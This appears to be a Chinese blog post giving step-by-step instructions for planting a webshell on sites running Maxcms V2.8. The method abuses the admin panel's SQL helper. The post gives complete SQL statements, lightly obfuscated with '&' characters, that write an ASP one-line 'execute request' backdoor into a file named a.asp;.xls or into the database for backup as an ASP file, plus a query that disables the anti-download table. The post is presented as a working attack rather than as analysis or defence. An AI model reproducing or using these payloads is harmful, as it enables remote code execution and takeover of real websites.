Maxcms V2.8电影系统获取shell
由于本人网站所在服务器会过滤某些关键字,过滤成****,所以这里的某些字符我给替换一下,你们懂的!请去掉&就可以了。
程序版本为Maxcms V2.8,而网络上有的获取 shell 版本在2.5。2.5中大部分方法都已经不行。
后台有个 SQL高级助手,于是立刻想到两种思路。第一是通过Access导出a.asp;.Xls的方式。另一种是一句话直接写入数据库,将其备份为asp程序执行。
第一种方法比较好实现。如下语句就可以办到。
create table a (a v&a&r&c&h&a&r(50))
insert into a (a) values ('<%e&x&e&cute request("value")%>')
select * into [a] in 'D:\web\a.asp;.xls' 'excel 4.0;' from a
独自等待补充:
SELECT '<%e&x&e&cute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
其实使用这一句话就可以的,但是前提是表a是存在的,原作者的是可以成功的,这里只是多给一种方法。
第二种方式是采用将一句话写入数据库。备份出来,但由于数据库中存在着防下载表。就算写进了数据库也不一定爆得出源码,于是在SQL高级助手处使用如下语句。
update XXXX set notdown=0x
原理就不多说了。自己百度,这样/inc/datas.asp就能爆出代码。
通过后台 → 模板 → 自定义标签处往数据库中写入一句话,然后从后台将数据库备份成asp文件
关健词:Maxcms
新文章:
- CentOS7下图形配置网络的方法
- CentOS 7如何添加删除用户
- 如何解决centos7双系统后丢失windows启动项
- CentOS单网卡如何批量添加不同IP段
- CentOS下iconv命令的介绍
- Centos7 SSH密钥登陆及密码密钥双重验证详解
- CentOS 7.1添加删除用户的方法
- CentOS查找/扫描局域网打印机IP讲解
- CentOS7使用hostapd实现无AP模式的详解
- su命令不能切换root的解决方法
- 解决VMware下CentOS7网络重启出错
- 解决Centos7双系统后丢失windows启动项
- CentOS下如何避免文件覆盖
- CentOS7和CentOS6系统有什么不同呢
- Centos 6.6默认iptable规则详解